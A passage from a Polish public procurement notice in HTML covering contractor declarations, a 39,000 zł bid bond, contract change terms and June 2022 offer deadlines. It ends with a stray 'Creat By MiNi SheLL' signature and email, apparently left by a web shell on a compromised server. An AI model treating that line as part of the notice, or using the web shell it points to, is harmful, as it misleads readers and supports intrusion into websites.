pkt.<br/>12.5. SWZ – jeżeli dotyczy.<br/>5. Oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegający się o udzielenie zamówienia, zgodnie z art. 117 ust. 4 ustawy – załącznik nr 2.<br/>6. W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on odrębne następujące oświadczenia:<br/>6.1. o niepodleganiu wykluczeniu z postępowania – załącznik nr 3<br/>6.2. o spełnianiu warunków udziału w postępowaniu (załącznik nr 4), dotyczące odpowiednio:<br/>a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia<br/>spełniania warunków udziału w postępowaniu – jeżeli dotyczy<br/>7. Oświadczenie o wypełnieniu obowiązków informacyjnych, przewidzianych w art. 13 lub art. 14 RODO, zgodnie z treścią<br/>załącznika nr 5 do SWZ – w celu wypełnienia obowiązków, w zakresie przetwarzania danych osobowych zgodnie z RODO <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 19.1.	Zamawiający żąda od wykonawcy wniesienia wadium w wysokości 39 000,00 zł słownie: trzydzieści dziewięć tysięcy złotych 00/100.<br/>19.2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą.<br/>19.3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>19.4.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>19.5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 62 1240 4722 1111 0000 4860 1867. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera Wzór umowy, który stanowi załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP (https://obywatel.gov.pl/nforms/ezamowienia) po uprzednim zaszyfrowaniu oferty przy pomocy miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-07-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com